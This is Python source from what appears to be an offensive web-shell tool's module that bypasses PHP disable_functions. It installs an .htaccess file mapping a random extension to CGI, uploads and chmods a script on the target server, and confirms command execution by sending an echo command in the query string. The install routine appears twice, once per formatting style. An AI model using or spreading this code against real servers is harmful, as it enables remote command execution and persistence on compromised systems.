def _install(self): if not self.vectors.get_result('mod_cgi'): log.warning(messages.module_audit_disablefunctionbypass. error_mod_cgi_disabled) return filename = strings.randstr( 5, charset=string.ascii_lowercase).decode('utf-8') ext = strings.randstr(3, charset=string.ascii_lowercase).decode('utf-8') result_install_htaccess = self.vectors.get_result( 'install_htaccess', format_args={'extension': ext}) if (not result_install_htaccess or not result_install_htaccess[0][0] or not result_install_htaccess[0][1]): log.warning(messages.module_audit_disablefunctionbypass. error_installing_htaccess) return htaccess_absolute_path = result_install_htaccess[0][0] script_absolute_path = '%s.%s' % (htaccess_absolute_path.replace( '.htaccess', filename), ext) script_url = '%s.%s' % (result_install_htaccess[0][1].replace( '.htaccess', filename), ext) result_install_script = self.vectors.get_result( 'install_script', format_args={ 'script': self.args.get('script'), 'rpath': script_absolute_path }) if not result_install_script: log.warning(messages.module_audit_disablefunctionbypass. error_uploading_script_to_s % script_absolute_path) self._clean(htaccess_absolute_path, script_absolute_path) return result_chmod = self.vectors.get_result( 'chmod', format_args={'rpath': script_absolute_path}) if not result_chmod: log.warning(messages.module_audit_disablefunctionbypass. error_changing_s_mode % script_absolute_path) self._clean(htaccess_absolute_path, script_absolute_path) return if not self._check_response(script_url): log.warning(messages.module_audit_disablefunctionbypass. error_s_unexpected_output % (script_url)) self._clean(htaccess_absolute_path, script_absolute_path) return log.warning(messages.module_audit_disablefunctionbypass. cgi_installed_remove_s_s % (htaccess_absolute_path, script_absolute_path)) log.warning( messages.module_audit_disablefunctionbypass.run_s_skip_reinstalling % (script_url)) return script_url
def _install(self): if not self.vectors.get_result('mod_cgi'): log.warning(messages.module_audit_disablefunctionbypass.error_mod_cgi_disabled) return filename = strings.randstr(5, charset = string.ascii_lowercase) ext = strings.randstr(3, charset = string.ascii_lowercase) result_install_htaccess = self.vectors.get_result( 'install_htaccess', format_args = { 'extension': ext } ) if ( not result_install_htaccess or not result_install_htaccess[0][0] or not result_install_htaccess[0][1] ): log.warning(messages.module_audit_disablefunctionbypass.error_installing_htaccess) return htaccess_absolute_path = result_install_htaccess[0][0] script_absolute_path = '%s.%s' % (htaccess_absolute_path.replace('.htaccess',filename), ext) script_url = '%s.%s' % ( result_install_htaccess[0][1].replace('.htaccess',filename), ext ) result_install_script = self.vectors.get_result( 'install_script', format_args = { 'script' : self.args.get('script'), 'rpath': script_absolute_path } ) if not result_install_script: log.warning(messages.module_audit_disablefunctionbypass.error_uploading_script_to_s % script_absolute_path) self._clean(htaccess_absolute_path, script_absolute_path) return result_chmod = self.vectors.get_result( 'chmod', format_args = { 'rpath': script_absolute_path } ) if not result_chmod: log.warning(messages.module_audit_disablefunctionbypass.error_changing_s_mode % script_absolute_path) self._clean(htaccess_absolute_path, script_absolute_path) return if not self._check_response(script_url): log.warning(messages.module_audit_disablefunctionbypass.error_s_unexpected_output % (script_url)) self._clean(htaccess_absolute_path, script_absolute_path) return log.warning(messages.module_audit_disablefunctionbypass.cgi_installed_remove_s_s % (htaccess_absolute_path, script_absolute_path)) log.warning(messages.module_audit_disablefunctionbypass.run_s_skip_reinstalling % (script_url)) return script_url
def _check_response(self, script_url): script_query = '%s?c=' % (script_url) query_random_str = strings.randstr(5) command_query = '%secho%%20%s' % (script_query, query_random_str) result_request = http.request(command_query) return query_random_str in result_request